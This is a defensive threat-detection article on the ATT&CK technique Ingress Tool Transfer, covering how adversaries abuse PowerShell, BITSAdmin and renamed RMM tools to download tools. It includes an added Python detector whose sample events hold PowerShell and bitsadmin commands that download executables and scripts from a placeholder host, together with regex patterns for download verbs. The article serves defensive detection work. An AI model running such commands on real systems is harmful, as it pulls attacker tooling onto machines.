Why do adversaries use Ingress Tool Transfer?
Note: Ingress Tool Transfer has no sub-techniques.
Administrative tooling and other native operating system binaries offer adversaries a rich array of functionalities that are ripe for abuse. While an adversary can accomplish many of their objectives by living off the land, they often require non-native tooling to perform post-exploitation activity and accomplish their goals. The process for bringing their own tools into an environment is known as ingress tool transfer.
How do adversaries use Ingress Tool Transfer?
One way to organize the many variations on ingress tool transfer is to split the activity into two distinct but broad categories:
- transferral via native Windows binaries
- transferral via third-party tooling
Many native system binaries enable adversaries to make external network connections and download executables, scripts, and other binaries. In fact, we observe adversaries leveraging native system binaries to perform ingress tool transfer far more often than not. This is a major part of the reason that we commonly observe the Ingress Tool Transfer technique in tandem with other ATT&CK techniques. As such, we’ll spend the bulk of this section explaining how adversaries abuse legitimate executables for ingress tool transfer.
However, we’ll start with a brief examination of non-native software that adversaries use to transfer tools, which should set the stage for why native tooling is an appealing choice. Almost all command and control (C2) frameworks provide support for uploading and downloading files. Despite this, adversaries frequently choose to abuse native binaries to retrieve additional tools and payloads. There are many nuanced reasons why an adversary might choose a system binary over C2 functionality, but it mostly boils down to blending in. For example, while it might be highly suspicious for a C2-related process to reach out to an external network address and pull down a binary, it could be completely normal for a legitimate system process to do the same.
Beyond C2 tools, it’s not unusual to see adversaries using remote monitoring and management (RMM) tools to perform ingress tool transfer. RMM software can be problematic for an adversary though, as defenders can simply block the use of tools that aren’t permitted in their environment, which is precisely why adversaries often resort to renaming such tools.
PowerShell is, by a wide margin, the system binary that we detect adversaries leveraging most frequently for ingress tool transfer. Relatedly, Ingress Tool Transfer (T1105) and PowerShell (T1059.001) are the second most commonly co-occurring techniques in threat detections across Red Canary.
Another native system binary commonly abused by adversaries is BITSAdmin. BITSAdmin is a utility that manages Windows Background Intelligent Transfer Service (BITS) jobs, primarily for the purpose of downloading Windows Updates, but adversaries use it to download arbitrary files.
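Detection logic for the two binaries discussed above, as an added example that is not part of the original article or Red Canary's own detection logic: it flags PowerShell and BITSAdmin command lines that carry a download verb plus a remote URL, keyed on the PE original file name so a renamed copy still matches. The event field names (`image`, `original_name`, `cmdline`) and all sample events are constructed assumptions.

```python
import re

# Constructed process-creation events; field names are assumed, modelled on
# common EDR/Sysmon telemetry. Hosts and paths are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
BITS = r"C:\Windows\System32\bitsadmin.exe"
EVENTS = [
    {"image": PS, "original_name": "PowerShell.EXE", "cmdline":
     r"powershell -nop -c (New-Object Net.WebClient).DownloadFile("
     r"'http://files.example.test/a.exe','C:\Users\Public\a.exe')"},
    {"image": BITS, "original_name": "bitsadmin.exe", "cmdline":
     r"bitsadmin /transfer job1 /download /priority high "
     r"https://files.example.test/b.dll C:\ProgramData\b.dll"},
    # Renamed copy of powershell.exe: image name differs, PE metadata does not.
    {"image": r"C:\Users\Public\svc.exe", "original_name": "PowerShell.EXE",
     "cmdline": "svc.exe iwr https://files.example.test/c.ps1 -OutFile c.ps1"},
    # Benign uses that must not alert.
    {"image": PS, "original_name": "PowerShell.EXE",
     "cmdline": r"powershell Get-ChildItem C:\Temp"},
    {"image": BITS, "original_name": "bitsadmin.exe",
     "cmdline": "bitsadmin /list /allusers"},
]

# Download verbs per binary, matched case-insensitively on the command line.
RULES = {
    "powershell.exe": re.compile(
        r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer",
        re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/addfile", re.I),
}
URL = re.compile(r"(?:https?|ftp)://[^\s'\"()]+", re.I)

def detect(event):
    """Return a finding dict if the event looks like a tool download, else None."""
    binary = event["original_name"].lower()  # survives renaming of the file
    rule = RULES.get(binary)
    if rule is None or not rule.search(event["cmdline"]):
        return None
    urls = URL.findall(event["cmdline"])
    if not urls:
        return None  # download verb without a remote source
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    return {"binary": binary, "urls": urls, "renamed": image_name != binary}

def scan(events):
    """Run detect() over all events and keep only the findings."""
    return [finding for finding in map(detect, events) if finding]
```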
The LOLBAS project is a great resource and searchable database that’s mapped to ATT&CK and documents native binaries, scripts, and libraries that adversaries abuse. You can examine a full list of binaries that are used for ingress tool transfer here.
While we haven’t observed it firsthand, numerous threats have reportedly performed Ingress Tool Transfer into cloud-hosted systems to download additional payloads, lateral movement scripts, and more.